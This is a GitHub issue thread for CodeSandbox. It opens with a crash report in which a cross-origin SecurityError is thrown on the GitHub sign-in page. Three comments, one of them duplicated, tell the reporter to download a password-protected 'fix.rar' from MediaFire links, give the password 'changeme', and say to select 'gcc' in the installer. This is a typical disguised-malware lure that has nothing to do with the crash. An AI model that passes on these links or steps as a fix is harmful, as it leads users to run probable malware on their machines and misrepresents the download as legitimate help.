### ISSUE TITLE
Crash importing repo

### ISSUE THREAD

**Issue by Kyl67899** [codesandbox/codesandbox-client#8565]
<h1>💥 Crash Report</h1>

  <h2>What were you trying to accomplish when the crash occurred?</h2>

  > Please use this issue template to describe what you were doing when you encountered this crash. While we are able to fill in some details automatically, it's not always enough to reproduce!

  <h3>Link to sandbox: [link]() (optional)</h3>

  <h3>Crash Details</h3>

  <details>
  <summary>Environment</summary>

  | Browser |  Version  | Operating System | CodeSandbox Version |
  | ------- | --------- | ---------------- | ------------------- |
  | chrome | 127.0.0 | OS X 10.15.7           | 84311d68c          |

  **Route:**
  https://codesandbox.io/signin/github

  

  </details>

  <details>
  <summary>Error Message</summary>

  ```bash
  SecurityError: Failed to read a named property 'origin' from 'Location': Blocked a frame with origin "https://codesandbox.io" from accessing a cross-origin frame.
  Error: Failed to read a named property 'origin' from 'Location': Blocked a frame with origin "https://codesandbox.io" from accessing a cross-origin frame.
    at new m (https://codesandbox.io/static/js/page-sign-in.e22241a32.chunk.js:1:6797)
    at Si (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1957295)
    at Ys (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1974093)
    at xa (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2011893)
    at ml (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1996242)
    at hl (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1996167)
    at il (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1993515)
    at https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951957
    at t.unstable_runWithPriority (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2026939)
    at qo (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951666)
  
    in m
    in Unknown
    in t
    in t
    in div
    in elements__Content
    in De
    in withRouter(De)
    in div
    in elements__Container
    in Unknown
    in withRouter()
    in t
    in Unknown
    in Ie
    in c
    in t
  ```

  </details>

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
